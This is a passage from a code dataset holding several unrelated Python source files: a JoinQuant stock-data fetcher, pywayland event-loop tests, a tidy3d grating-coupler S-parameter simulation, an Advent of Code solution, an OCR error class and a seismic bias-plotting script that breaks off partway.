ind_names})\n return df\n\n res = pd.DataFrame()\n for date in all_trade_dates:\n universe = jq.get_all_securities(date=date).index\n all_sw_industry = jq.get_industries(name=name, date=date)\n all_sw_industry2 = all_sw_industry.reset_index()\n\n ind_names = all_sw_industry['name']\n\n func = partial(__get_daily_cons, date=date, ind_names=ind_names)\n ind_cons = all_sw_industry2.iloc[:, 0].apply(func)\n ind_cons = pd.concat(ind_cons.values).reset_index(drop=True)\n\n res = pd.concat([res, ind_cons])\n return res\n\n\ndef get_caps(start_date=None, end_date=None, trade_date=None):\n ###########流通市值#########\n\n if trade_date is not None:\n start_date = trade_date\n end_date = trade_date\n daterange = jq.get_trade_days(start_date=start_date, end_date=end_date)\n\n q = jq.query(jq.valuation.capitalization,\n jq.valuation.circulating_cap,\n jq.valuation.code,\n jq.valuation.day)\n\n def get_data(q, x):\n df = jq.get_fundamentals(q, date=x)\n return df\n dflist = list(map(lambda x: get_data(q, x), daterange))\n # dflist = list(filter(lambda x: not x.empty, dflist))\n # if dflist:\n data = pd.concat(dflist).rename(columns={'day': 'date'})\n # else:\n # raise Exception('get_caps failed')\n # data['date'] = pd.to_datetime(data['date'])\n data['date'] = data['date'].apply(lambda x: pd.to_datetime(x).date())\n return data\n\n\ndef get_eps(start_date=None, end_date=None, trade_date=None):\n ##########eps########\n\n if trade_date is not None:\n start_date = trade_date\n end_date = trade_date\n stocks = jq.get_all_securities(\n types=['stock'], date=trade_date).index.to_list()\n df = jq.get_factor_values(stocks, 'eps_ttm', start_date, end_date)[\n 'eps_ttm'].T\n value_vars = df.columns\n df['code'] = df.index\n df_res = pd.melt(df, id_vars=[\n 'code'], value_vars=value_vars, var_name='date', value_name='eps_ttm')\n df_res['date'] = df_res['date'].apply(lambda x: x.date())\n return df_res[['code', 'date', 'eps_ttm']]\n\n\ndef get_index_weights(index_list=INDEX_CODES, start_date=None, end_date=None, trade_date=None):\n ###########指数成分##############\n \"\"\"单位为%\"\"\"\n if trade_date is not None:\n start_date = jq.get_trade_days(start_date=trade_date)[1]\n end_date = jq.get_trade_days(start_date=trade_date)[1]\n index_name_list = [INDEX_NAMES[ind] for ind in INDEX_CODES]\n all_trade_dates = jq.get_trade_days(\n start_date=start_date, end_date=end_date)\n start_month_firstday = datetime.datetime(\n all_trade_dates[0].year, all_trade_dates[0].month, 1)\n end_month_firstday = datetime.datetime(\n all_trade_dates[0].year, all_trade_dates[-1].month, 1)\n month_starts = pd.date_range(\n start_month_firstday, end_month_firstday, freq='MS')\n month_starts = [i.date() for i in month_starts]\n new_all_trade_dates = sorted(\n list(set(all_trade_dates.tolist() + month_starts)))\n datas = []\n # print(f'all_trade_dates:{all_trade_dates} \\n start_month_firstday:{start_month_firstday} \\n end_month_firstday:{end_month_firstday}\\n ')\n # print(f'month_starts:{month_starts}\\n new_all_trade_dates:{new_all_trade_dates}')\n def __get_index_weights(index_code, all_trade_dates, month_starts):\n datas = []\n for date in month_starts:\n universe = jq.get_all_securities(date=date).index\n daily_cons = jq.get_index_weights(\n index_code, date=date)[['weight']]\n daily_cons = daily_cons.reindex(universe).fillna(0)\n daily_cons.index.name = 'code'\n daily_cons['date'] = date\n datas.append(daily_cons)\n datas = pd.concat(datas).reset_index()\n datas = datas.set_index(['date', 'code'])\n return datas\n for index in index_list:\n 
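        # Gather month-start weights for one index at a time; the concat and
        # groupby below forward-fill them onto every trade day.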
datas.append(__get_index_weights(\n index, all_trade_dates=all_trade_dates, month_starts=month_starts))\n datas = pd.concat(datas, axis=1)\n datas = datas.groupby(level=1).apply(lambda x: x.droplevel(1).reindex(\n new_all_trade_dates).ffill().reindex(all_trade_dates)).swaplevel(0, 1)\n datas.columns = index_name_list\n datas = datas.reset_index()\n # print(datas)\n if trade_date is not None:\n datas['date'] = trade_date\n return datas\n\n\ndef get_summary_data(start_date=None, end_date=None, trade_date=None, index_col=['date', 'code'], func_list=[get_industry_cons, get_caps, get_eps, get_index_weights]):\n #########获取汇总数据#############\n\n if trade_date is not None:\n start_date = trade_date\n end_date = trade_date\n datas = []\n for func in func_list:\n data = func(start_date=start_date, end_date=end_date,\n trade_date=trade_date)\n # if not data.empty:\n # print(str(func))\n # print(data)\n # print(data['date'].dtype)\n data = data.set_index(index_col)\n datas.append(data)\n datas = pd.concat(datas, axis=1)\n return datas.reset_index()\n\nclass jq_bar_api():\n def __init__(self):\n self.all_factors = ['open', 'close', 'high', 'low', 'volume', 'money', 'avg', 'high_limit', 'low_limit', 'pre_close', 'paused', 'factor']\n def query(\n self, \n universe=None,\n factor_list=None,\n start_date=None,\n end_date=None,\n trade_date=None,\n ):\n if trade_date is not None:\n trade_date = datetime.datetime.strptime(trade_date,'%Y-%m-%d')\n start_date = trade_date\n end_date = trade_date + datetime.timedelta(1)\n end_date = end_date.strftime('%Y-%m-%d')\n else:\n if start_date is None:\n start_date = '2010-01-01'\n\n if end_date is None:\n end_date = datetime.datetime.now().strftime('%Y-%m-%d')\n df = jq.get_price(universe, start_date=start_date, end_date=end_date, frequency='daily', fields=factor_list, skip_paused=False, fq='post').rename(columns = {'time':'date'})\n return df\n\n\n\nclass ext_bardata_api2_jq():\n def __init__(self):\n self.all_factors = ['pe_ratio', 'turnover_ratio', 'pb_ratio', 'ps_ratio', 'pcf_ratio', 'capitalization', 'market_cap', 'circulating_cap', 'circulating_market_cap', 'pe_ratio_lyr']\n def query(\n self, \n universe=None,\n factor_list=None,\n start_date=None,\n end_date=None,\n trade_date=None,\n ):\n if trade_date is not None:\n trade_date = datetime.datetime.strptime(trade_date,'%Y-%m-%d')\n start_date = trade_date\n end_date = trade_date + datetime.timedelta(1)\n end_date = end_date.strftime('%Y-%m-%d')\n else:\n if start_date is None:\n start_date = '2010-01-01'\n\n if end_date is None:\n end_date = datetime.datetime.now().strftime('%Y-%m-%d')\n \n # universe_set =tuple(universe)\n # sql = f\"SELECT stock_valuation.id, stock_valuation.code, stock_valuation.pe_ratio, stock_valuation.turnover_ratio, stock_valuation.pb_ratio, stock_valuation.ps_ratio, stock_valuation.pcf_ratio, stock_valuation.capitalization, stock_valuation.market_cap, stock_valuation.circulating_cap, stock_valuation.circulating_market_cap, stock_valuation.day, stock_valuation.pe_ratio_lyr \\nFROM stock_valuation \\nWHERE stock_valuation.code in {universe_set} AND ((stock_valuation.day>='{start_date}') AND (stock_valuation.day<='{end_date}')) \\n LIMIT 10000\"\n # sql2 = \"SELECT stock_valuation.id, stock_valuation.code, stock_valuation.pe_ratio, stock_valuation.turnover_ratio, stock_valuation.pb_ratio, stock_valuation.ps_ratio, stock_valuation.pcf_ratio, stock_valuation.capitalization, stock_valuation.market_cap, stock_valuation.circulating_cap, stock_valuation.circulating_market_cap, 
stock_valuation.day, stock_valuation.pe_ratio_lyr \\nFROM stock_valuation \\nWHERE stock_valuation.code IN ('000001.XSHE') AND stock_valuation.day = '2022-08-01' \\n LIMIT 10000\"\n # ins = JQDataClient.instance()\n # ins.get_fundamentals(sql=sql)\n \n days = jq.get_trade_days(start_date=start_date,end_date=end_date, count=None)\n all_df = []\n for day in days:\n \n df = jq.get_fundamentals(jq.query(\n jq.valuation\n ).filter(\n jq.valuation.code.in_(universe)\n ), date=day)\n\n if df.empty:\n print(f'{day} empty')\n continue\n del df['id']\n df.rename(columns={'day': 'date'}, inplace=True)\n\n columns = list(df.columns)\n columns.insert(0, columns.pop(columns.index('code')))\n columns.insert(0, columns.pop(columns.index('date')))\n df0 = df[columns]\n all_df.append(df0)\n all_df = pd.concat(all_df) \n all_df = all_df.set_index(['date','code'])[self.all_factors]\n return all_df\n\n\nclass ext_bardata_api_jq():\n def __init__(self):\n self.all_factors = ['industry_name', 'capitalization', 'circulating_cap', 'eps_ttm', 'sz50', 'hs300', 'zz500', 'zz1000', 'kc50', 'szcz', 'cybz', 'szzs']\n def query(\n self, \n universe=None,\n factor_list=None,\n start_date=None,\n end_date=None,\n trade_date=None,\n ):\n if trade_date is not None:\n trade_date = datetime.datetime.strptime(trade_date,'%Y-%m-%d')\n start_date = trade_date\n end_date = trade_date + datetime.timedelta(1)\n end_date = end_date.strftime('%Y-%m-%d')\n else:\n if start_date is None:\n start_date = '2010-01-01'\n\n if end_date is None:\n end_date = datetime.datetime.now().strftime('%Y-%m-%d')\n all_data = get_summary_data(start_date=start_date,end_date=end_date,trade_date=trade_date)\n all_data = all_data.set_index(['date','code'])[self.all_factors]\n return all_data\n\njq_bar_api = jq_bar_api()\next_bardata_api_jq = ext_bardata_api_jq()\next_bardata_api2_jq = ext_bardata_api2_jq()\n\n\nif __name__ == '__main__':\n all_sec = jq.get_all_securities().index.tolist()\n bar = jq_bar_api.query(universe=all_sec,start_date='2022-07-25',end_date='2022-07-25')\n ext_bardata = ext_bardata_api_jq.query(universe=all_sec,start_date='2022-07-25',end_date='2022-07-25')\n ext_bardata2 = ext_bardata_api2_jq.query(universe=all_sec,start_date='2022-07-25',end_date='2022-07-25')\n print('paused......')","repo_name":"robortcher/singletrader","sub_path":"singletrader/datautils/dataapi/jqapi.py","file_name":"jqapi.py","file_ext":"py","file_size_in_byte":12153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35517128265","text":"import os\nimport signal\nimport time\n\nfrom pywayland.server.eventloop import EventLoop\nfrom pywayland.server.listener import Listener\n\n\nclass _GetCallback:\n def __init__(self):\n self.callback = None\n self.n_calls = 0\n\n\ndef _fd_callback(fd, mask, data):\n data.callback = fd\n data.n_calls += 1\n return 0\n\n\ndef _signal_callback(signal_number, data):\n data.callback = signal_number\n data.n_calls += 1\n return 1\n\n\ndef _timer_callback(data):\n data.n_calls += 1\n return 1\n\n\ndef test_event_loop_post_dispatch_check():\n callback = _GetCallback()\n event_loop = EventLoop()\n\n r, w = os.pipe()\n\n try:\n source = event_loop.add_fd(\n r, _fd_callback, EventLoop.FdMask.WL_EVENT_READABLE, callback\n )\n source.check()\n\n event_loop.dispatch(0)\n assert callback.callback == r\n finally:\n os.close(r)\n os.close(w)\n\n\ndef test_event_loop_signal():\n callback = _GetCallback()\n event_loop = EventLoop()\n\n event_loop.add_signal(signal.SIGUSR1, _signal_callback, 
callback)\n\n event_loop.dispatch(0)\n assert callback.callback is None\n\n os.kill(os.getpid(), signal.SIGUSR1)\n\n event_loop.dispatch(0)\n assert callback.callback == signal.SIGUSR1\n\n\ndef test_event_loop_multiple_same_signals():\n callback = _GetCallback()\n event_loop = EventLoop()\n\n signal_rm = event_loop.add_signal(signal.SIGUSR1, _signal_callback, callback)\n event_loop.add_signal(signal.SIGUSR1, _signal_callback, callback)\n\n event_loop.dispatch(0)\n assert callback.n_calls == 0\n\n # Check callback gets 2 calls\n for _ in range(5):\n callback.n_calls = 0\n os.kill(os.getpid(), signal.SIGUSR1)\n event_loop.dispatch(0)\n\n assert callback.n_calls == 2\n\n # Remove one of the signals\n signal_rm.remove()\n\n # Callback only gets call now\n for _ in range(5):\n callback.n_calls = 0\n os.kill(os.getpid(), signal.SIGUSR1)\n event_loop.dispatch(0)\n\n assert callback.n_calls == 1\n\n\ndef test_event_loop_timer():\n callback = _GetCallback()\n event_loop = EventLoop()\n\n source = event_loop.add_timer(_timer_callback, callback)\n source.timer_update(10)\n\n event_loop.dispatch(0)\n assert callback.n_calls == 0\n\n event_loop.dispatch(20)\n assert callback.n_calls == 1\n\n\ndef _timer_update_callback1(data):\n data.n_calls += 1\n data.source2.timer_update(1000)\n return 1\n\n\ndef _timer_update_callback2(data):\n data.n_calls += 1\n data.source1.timer_update(1000)\n return 1\n\n\ndef test_event_loop_timer_updates():\n callback = _GetCallback()\n event_loop = EventLoop()\n\n source1 = event_loop.add_timer(_timer_update_callback1, callback)\n source1.timer_update(10)\n\n source2 = event_loop.add_timer(_timer_update_callback2, callback)\n source2.timer_update(10)\n\n callback.source1 = source1\n callback.source2 = source2\n\n assert callback.n_calls == 0\n\n # Wait 15 ms, so both timers should be called when we dispatch\n time.sleep(0.015)\n\n # This should take < 1 sec\n start_time = time.time()\n event_loop.dispatch(20)\n end_time = time.time()\n\n assert callback.n_calls == 2\n\n assert end_time - start_time < 1\n\n\ndef _destroy_notify_a(listener, data):\n global a\n a = True\n\n\ndef _destroy_notify_b(listener, data):\n global b\n b = True\n\n\ndef test_event_loop_destroy():\n global a, b\n a = False\n b = False\n\n event_loop = EventLoop()\n listener_a = Listener(_destroy_notify_a)\n listener_b = Listener(_destroy_notify_b)\n\n event_loop.add_destroy_listener(listener_a)\n event_loop.add_destroy_listener(listener_b)\n\n listener_a.remove()\n\n event_loop.destroy()\n\n import gc\n\n gc.collect()\n\n assert a is False\n assert b is True\n","repo_name":"flacjacket/pywayland","sub_path":"test/test_server_eventloop.py","file_name":"test_server_eventloop.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"48"} +{"seq_id":"40597128777","text":"from __future__ import annotations\n\nimport pathlib\nimport time\nfrom collections.abc import Awaitable\n\nimport gdsfactory as gf\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tidy3d as td\nimport yaml\nfrom gdsfactory.config import logger\nfrom gdsfactory.serialization import clean_value_json\nfrom gdsfactory.typings import (\n Any,\n Component,\n ComponentSpec,\n Dict,\n List,\n PathType,\n Sparameters,\n)\n\nfrom gplugins.common.utils.get_sparameters_path import (\n get_sparameters_path_tidy3d as get_sparameters_path,\n)\nfrom gplugins.tidy3d.get_results import _executor, get_results\nfrom 
gplugins.tidy3d.get_simulation_grating_coupler import (\n get_simulation_grating_coupler,\n)\n\n\ndef plot_simulation(\n sim: td.Simulation,\n z: float = 0.0,\n y: float = 0.0,\n wavelength: float | None = 1.55,\n figsize: tuple[float, float] = (11, 4),\n):\n \"\"\"Returns Simulation visual representation. Returns two views for 3D component and one view for 2D.\n\n Args:\n sim: simulation object.\n z: (um).\n y: (um).\n wavelength: (um) for epsilon plot. None plot structures only.\n figsize: figure size.\n\n \"\"\"\n fig = plt.figure(figsize=figsize)\n if sim.size[2] > 0.1 and sim.size[1] > 0.1:\n gs = mpl.gridspec.GridSpec(1, 2, figure=fig, width_ratios=[1, 1.4])\n ax1 = fig.add_subplot(gs[0, 0])\n ax2 = fig.add_subplot(gs[0, 1])\n if wavelength:\n freq = td.constants.C_0 / wavelength\n sim.plot_eps(z=z, ax=ax1, freq=freq)\n sim.plot_eps(y=y, ax=ax2, freq=freq)\n else:\n sim.plot(z=z, ax=ax1)\n sim.plot(y=y, ax=ax2)\n elif sim.size[2] > 0.1: # 2D grating sim_size_y = 0\n gs = mpl.gridspec.GridSpec(1, 1, figure=fig, width_ratios=[1])\n ax1 = fig.add_subplot(gs[0, 0])\n if wavelength:\n freq = td.constants.C_0 / wavelength\n sim.plot_eps(y=y, ax=ax1, freq=freq)\n else:\n sim.plot(y=y, ax=ax1)\n\n else: # 2D planar component size_z = 0\n gs = mpl.gridspec.GridSpec(1, 1, figure=fig, width_ratios=[1])\n ax1 = fig.add_subplot(gs[0, 0])\n if wavelength:\n freq = td.constants.C_0 / wavelength\n sim.plot_eps(z=z, ax=ax1, freq=freq)\n else:\n sim.plot(z=z, ax=ax1)\n\n plt.show()\n return fig\n\n\ndef write_sparameters_grating_coupler(\n component: ComponentSpec,\n dirpath: PathType | None = None,\n filepath: PathType | None = None,\n overwrite: bool = False,\n port_waveguide_name: str = \"o1\",\n fiber_port_prefix: str = \"opt\",\n verbose: bool = False,\n run: bool = True,\n **kwargs,\n) -> Sparameters:\n \"\"\"Get sparameter matrix from a gdsfactory grating coupler.\n\n Assumes grating coupler waveguide port is facing to the left (west).\n\n TODO: add a fiber model (more realistic than a gaussian_beam).\n\n Args:\n component: grating coupler gdsfactory Component to simulate.\n dirpath: directory to store sparameters in npz.\n Defaults to active Pdk.sparameters_path.\n filepath: optional sparameters file.\n overwrite: overwrites stored Sparameter npz results.\n verbose: prints info messages and progressbars.\n run: runs simulation, if False, only plots simulation.\n\n Keyword Args:\n port_extension: extend ports beyond the PML.\n layer_stack: contains layer to thickness, zmin and material.\n Defaults to active pdk.layer_stack.\n thickness_pml: PML thickness (um).\n xmargin: left/right distance from component to PML.\n xmargin_left: left distance from component to PML.\n xmargin_right: right distance from component to PML.\n ymargin: left/right distance from component to PML.\n ymargin_top: top distance from component to PML.\n ymargin_bot: bottom distance from component to PML.\n zmargin: thickness for cladding above and below core.\n clad_material: material for cladding.\n box_material: for bottom cladding.\n substrate_material: for substrate.\n box_thickness: bottom cladding thickness in (um).\n substrate_thickness: (um).\n port_waveguide_name: input port name.\n port_margin: margin on each side of the port.\n distance_source_to_monitors: in (um) source goes before monitors.\n port_waveguide_offset: mode solver workaround.\n positive moves source forward, negative moves source backward.\n wavelength: source center wavelength (um).\n if None takes mean between wavelength_start, wavelength_stop.\n 
wavelength_start: in (um).\n wavelength_stop: in (um).\n wavelength_points: number of wavelengths.\n plot_modes: plot source modes.\n num_modes: number of modes to plot.\n run_time_ps: make sure it's sufficient for the fields to decay.\n defaults to 10ps and counts on the automatic shutoff\n to stop earlier if needed.\n fiber_port_prefix: port prefix to place fiber source.\n fiber_xoffset: fiber center xoffset to fiber_port_name.\n fiber_z: fiber zoffset from grating zmax.\n fiber_mfd: fiber mode field diameter (um).\n fiber_angle_deg: fiber_angle in degrees with respect to normal.\n material_name_to_tidy3d: dispersive materials have a wavelength dependent index.\n Maps layer_stack names with tidy3d material database names.\n is_3d: True by default runs in 3D.\n with_all_monitors: stores all monitor fields.\n\n \"\"\"\n component = gf.get_component(component)\n if not isinstance(component, Component):\n raise ValueError(f\"component should be a gdsfactory.Component not {component}\")\n\n filepath = filepath or get_sparameters_path(\n component=component,\n dirpath=dirpath,\n **kwargs,\n )\n filepath = pathlib.Path(filepath).with_suffix(\".npz\")\n filepath_sim_settings = filepath.with_suffix(\".yml\")\n\n if filepath.exists() and not overwrite and run:\n logger.info(f\"Simulation loaded from {filepath!r}\")\n return dict(np.load(filepath))\n\n sim = get_simulation_grating_coupler(\n component,\n fiber_port_prefix=fiber_port_prefix,\n port_waveguide_name=port_waveguide_name,\n **kwargs,\n )\n if not run:\n plot_simulation(sim)\n return {}\n\n start = time.time()\n sim_data = get_results(sim, verbose=verbose)\n sim_data = sim_data.result()\n\n direction_inp = \"+\"\n monitor_entering = (\n sim_data.monitor_data[\"waveguide\"]\n .amps.sel(direction=direction_inp)\n .values.flatten()\n )\n direction_out = \"-\"\n monitor_exiting = (\n sim_data.monitor_data[\"waveguide\"]\n .amps.sel(direction=direction_out)\n .values.flatten()\n )\n r = monitor_entering / monitor_exiting\n t = monitor_exiting\n\n fiber_port_name = None\n for port_name in component.ports.keys():\n if port_name.startswith(fiber_port_prefix):\n fiber_port_name = port_name\n\n if fiber_port_name is None:\n raise ValueError(\n f\"No port named {fiber_port_prefix!r} in {component.ports.keys()}\"\n )\n\n freqs = sim_data.monitor_data[\"waveguide\"].amps.sel(direction=\"+\").f\n port_name_input = port_waveguide_name\n fiber_port_name = \"o2\"\n\n key = f\"{port_name_input}@0,{port_name_input}@0\"\n sp = {\"wavelengths\": td.constants.C_0 / freqs.values, key: r}\n key = f\"{fiber_port_name}@0,{fiber_port_name}@0\"\n sp[key] = r\n\n key = f\"{port_name_input}@0,{fiber_port_name}@0\"\n sp[key] = t\n\n key = f\"{fiber_port_name}@0,{port_name_input}@0\"\n sp[key] = t\n\n end = time.time()\n np.savez_compressed(filepath, **sp)\n kwargs.update(compute_time_seconds=end - start)\n kwargs.update(compute_time_minutes=(end - start) / 60)\n\n filepath_sim_settings.write_text(yaml.dump(clean_value_json(kwargs)))\n logger.info(f\"Write simulation results to {str(filepath)!r}\")\n logger.info(f\"Write simulation settings to {str(filepath_sim_settings)!r}\")\n return sp\n\n\ndef write_sparameters_grating_coupler_batch(\n jobs: List[Dict[str, Any]], **kwargs\n) -> List[Awaitable[Sparameters]]:\n \"\"\"Returns Sparameters for a list of write_sparameters.\n\n Each job runs in separate thread and is non blocking.\n You need to get the results using sp.result().\n\n Args:\n jobs: list of kwargs for write_sparameters_grating_coupler.\n kwargs: simulation 
settings.\n \"\"\"\n kwargs.update(verbose=False)\n return [\n _executor.submit(write_sparameters_grating_coupler, **job, **kwargs)\n for job in jobs\n ]\n\n\nif __name__ == \"__main__\":\n c = gf.components.grating_coupler_elliptical_lumerical() # inverse design grating\n offsets = [0, 5]\n offsets = [0]\n fiber_angle_deg = 8\n sp = write_sparameters_grating_coupler(c, is_3d=False)\n\n # dfs = [\n # write_sparameters_grating_coupler(\n # component=c,\n # is_3d=False,\n # fiber_angle_deg=fiber_angle_deg,\n # fiber_xoffset=fiber_xoffset,\n # filepath=PATH.sparameters_repo / f\"gc_offset{fiber_xoffset}.npz\",\n # )\n # for fiber_xoffset in offsets\n # ]\n\n # jobs = [\n # dict(\n # component=c,\n # is_3d=False,\n # fiber_angle_deg=fiber_angle_deg,\n # fiber_xoffset=fiber_xoffset,\n # filepath=PATH.sparameters_repo\n # / f\"gc_angle{fiber_angle_deg}_offset{fiber_xoffset}\",\n # )\n # for fiber_xoffset in offsets\n # ]\n # sps = write_sparameters_grating_coupler_batch(jobs)\n\n # import matplotlib.pyplot as plt\n # import gplugins as sim\n\n # sp = write_sparameters_grating_coupler(\n # c,\n # is_3d=False,\n # fiber_angle_deg=-5,\n # fiber_xoffset=+2,\n # )\n\n # sim.plot.plot_sparameters(sp)\n\n # c = gf.components.grating_coupler_elliptical_arbitrary(\n # widths=[0.343] * 25,\n # gaps=[0.345] * 25,\n # )\n # sp = write_sparameters_grating_coupler(c, is_3d=False)\n # t = sp.o1@0,o2@0\n # print(f\"Transmission = {t}\")\n\n # plt.plot(sp.wavelengths, sp.o1@0,o2@0)\n # plt.show()\n","repo_name":"gdsfactory/gplugins","sub_path":"gplugins/tidy3d/write_sparameters_grating_coupler.py","file_name":"write_sparameters_grating_coupler.py","file_ext":"py","file_size_in_byte":10221,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"26718237944","text":"with open('day6-input', 'r') as file:\n data = [l.strip('\\n') for l in file]\nimport numpy as np\ncoords = [[int(i.rstrip(',')) for i in c.split()] for c in data]\n\ndef distance(c1, c2):\n dx = abs(c1[0]-c2[0])\n dy = abs(c1[1]-c2[1])\n return dx+dy\n\ndistances = {}\nfor coord in coords:\n distances[tuple(coord)] = [distance(coord, c2) for c2 in coords if c2 is not coord]\n\ncell_coord = max(distances.items(), key=lambda x: min(x[1]))\nfield = np.zeros((500,500))\n\nblacklist = set()\nfor c1 in [(x,y) for x in range(500) for y in range(500)]:\n distances = [distance(c1, c2) for c2 in coords]\n min_dist = min(distances)\n if distances.count(min_dist) == 1:\n cell = min(enumerate(distances), key=lambda x: x[1])[0]\n field[c1] = cell\n x, y = c1\n if x == 0 or y == 0 or x == 499 or y == 499:\n blacklist.add(cell)\na = [(field == i).sum() for i in range(len(coords)) if i not in blacklist]\nprint(max(a)) # Part 1\n\n#sumarea = 0\nexpensive_size = 400 # Needs to fit all coords\nedge_extend_size = 10000 # Increase if necessary\nregion = np.zeros((edge_extend_size,edge_extend_size))\nfor c1 in [(x,y) for x in range(-expensive_size, expensive_size) for y in range(-expensive_size, expensive_size)]:\n total_dist = sum([distance(c1, c2) for c2 in coords])\n #if total_dist < 10000:\n #sumarea += 1\n region[c1] = total_dist\n#print(sumarea)\n\ntotal_inc = len(coords)\n\nr = region.copy()\nfor i in range(expensive_size, edge_extend_size//2+1):\n r[i,:] = r[i-1,:]+total_inc\nfor i in range(-expensive_size, -edge_extend_size//2, -1):\n r[i,:] = r[i+1,:]+total_inc\nfor i in range(expensive_size, edge_extend_size//2+1):\n r[:,i] = r[:,i-1]+total_inc\nfor i in range(-expensive_size, -edge_extend_size//2, -1):\n 
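    # Outside the band that already covers every coordinate, each extra step
    # adds total_inc (= len(coords)) to the summed Manhattan distance, so the
    # remaining rows/columns are extrapolated instead of recomputed.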
r[:,i] = r[:,i+1]+total_inc\n\nprint((r < 10000).sum()) # Part 2\n","repo_name":"Birdulon/AdventOfCode","sub_path":"2018/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4545033165","text":"from typing import Dict\n\n\nclass OCRError(Exception):\n # all codes from https://ocr.space/ocrapi\n OCR_EXIT_CODES = {\n 1: \"parsed successfully\",\n 2: \"parsed partially\",\n 3: \"ENGINE ERROR: all pages failed\",\n 4: \"ENGINE ERROR: FATAL\",\n 6: \"Timed out while waiting for results\",\n 99: \"Not a valid URL; invalid image or pdf\",\n # our error message for a request that is very, very broken\n 999: \"Something went horribly wrong\",\n }\n\n PAGE_EXIT_CODES = {\n 1: \"success\",\n 0: \"file not found\",\n -10: \"OCR engine parse error\",\n -20: \"timeout\",\n -30: \"validation error\",\n -99: \"UNKNOWN ERROR\",\n 3: \"File failed validation\", # This is not documented, beware!\n }\n\n def __init__(self, result: Dict) -> None: # noqa D107\n super(OCRError, self).__init__(\n self.PAGE_EXIT_CODES.get(\n result[\"exit_code\"],\n f\"Unrecognized error: Code {result['exit_code']}, \"\n f\"{result['error_message']}: {result['error_details']}\",\n )\n )\n self.result = result\n","repo_name":"GrafeasGroup/blossom","sub_path":"blossom/ocr/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"11704175104","text":"from __future__ import division, print_function\n\n# Import Python modules\nimport os\nimport sys\nimport math\nimport numpy as np\nimport scipy.stats as st\nimport matplotlib as mpl\nif mpl.get_backend() != 'agg':\n mpl.use('Agg') # Disables use of Tk/X11\nimport pylab\n\nCOLORS2 = [\"red\", \"yellow\", \"sandybrown\", \"lime\", \"darkorange\", \"khaki\",\n \"yellowgreen\", \"violet\", \"palegreen\", \"turquoise\", \"gold\",\n \"cyan\", \"dodgerblue\", \"blueviolet\", \"magenta\",\n \"deeppink\", \"brown\", \"teal\", \"wheat\", \"silver\"]\nCOLORS = [\"red\", \"cyan\", \"gold\", \"lime\", \"blueviolet\",\n \"cyan\", \"gold\", \"lime\", \"blueviolet\", \"red\",\n \"gold\", \"lime\", \"blueviolet\", \"red\", \"cyan\",\n \"lime\", \"blueviolet\", \"red\", \"cyan\", \"gold\"]\nMARKERS = [\"+\", \"*\", \"^\", \"o\", \"x\",\n \"+\", \"*\", \"^\", \"o\", \"x\",\n \"+\", \"*\", \"^\", \"o\", \"x\",\n \"+\", \"*\", \"^\", \"o\", \"x\"]\n\ndef read_data(input_file):\n \"\"\"\n This function reads the input file and loads the data into\n our data structures\n \"\"\"\n rrup = None\n data = []\n ifile = open(input_file, 'r')\n for line in ifile:\n line = line.strip()\n # Skip empty lines\n if not line:\n continue\n # Skip comments\n if line.startswith(\"%\") or line.startswith(\"#\"):\n continue\n # Skip Average lines\n if line.startswith(\"Average\"):\n continue\n if line.startswith(\"Mechanism\"):\n # Done with this file!\n break\n if line.startswith(\"Rrup\"):\n # Process Rrup line\n pieces = line.split()\n distances = pieces[2]\n pieces = [float(piece) for piece in distances.split(\"-\")]\n rrup = np.mean(pieces)\n continue\n # Real data line, process it!\n pieces = line.split()[1:]\n pieces = [np.nan if piece == \"N/A\" else piece for piece in pieces]\n pieces = [float(piece) for piece in pieces]\n pieces.insert(0, rrup)\n pieces.append(line.split()[0])\n data.append(pieces)\n ifile.close()\n\n # All done, return data array\n return 
data\n\ndef summarize_and_plot_data(data, method, output_file):\n \"\"\"\n Summarized all data into the format we need for plotting\n \"\"\"\n mean_data = {}\n bins = 4\n titles = [\"0.01 to 0.1s\",\n \"0.1 to 1s\",\n \"1 to 3s\",\n \"> 3s\"]\n locs = [[0,0], [0,1], [1,0], [1,1]]\n event_names = np.array([piece[-1] for piece in data])\n\n # Calculate mean_data\n start = 1\n step = 3\n\n # Create fig\n fig, axs = pylab.plt.subplots(2, 2)\n fig.set_size_inches(17, 8.5)\n fig.suptitle(\"Method: %s\" % (method))\n fig.subplots_adjust(hspace=0.4)\n fig.subplots_adjust(left=0.05)\n fig.subplots_adjust(right=0.98)\n\n current = start\n for bin in range(0, bins):\n mean_data[bin] = {}\n mean_data[bin]['mean'] = np.array([piece[current] for piece in data])\n mean_data[bin]['n'] = np.array([piece[current+2] for piece in data])\n current = current + step\n\n # List of distances\n r = np.array([piece[0] for piece in data])\n \n # Process each bin\n for bin in range(0, bins):\n x = np.log(r[~np.isnan(mean_data[bin]['mean'])])\n y = mean_data[bin]['mean'][~np.isnan(mean_data[bin]['mean'])]\n event_data = []\n event_legend = []\n e_labels = event_names[~np.isnan(mean_data[bin]['mean'])]\n e_labels_set = sorted(list(set(e_labels)), key=str.lower)\n # First we create a list events/markers/colors for the legend\n for index, event in enumerate(e_labels_set):\n event_legend.append([event, COLORS[index], MARKERS[index]])\n print(\"%s - %s - %s\" % (event, COLORS[index], MARKERS[index]))\n for index, event in enumerate(e_labels_set):\n event_x = []\n event_y = []\n for label, x_val, y_val in zip(e_labels, x, y):\n if label == event:\n event_x.append(x_val)\n event_y.append(y_val)\n if len(event_x):\n event_data.append([event_x, event_y,\n COLORS[index], MARKERS[index]])\n\n ww = mean_data[bin]['n'][~np.isnan(mean_data[bin]['n'])]\n numdata = len(y)\n\n A = np.array([list(np.ones(len(x))), x])\n A = A.T\n W = np.diag(ww)\n b = np.linalg.lstsq(((A.T).dot(W)).dot(A),\n ((A.T).dot(W)).dot(np.array(y).T),\n rcond=-1)[0]\n intercept = b[0]\n slope = b[1]\n\n degfree = len(x) - 2\n e = y - (intercept + slope * x)\n var = np.sum(e * e) / degfree\n se_y = np.sqrt(var)\n sdev = np.sqrt(var)\n 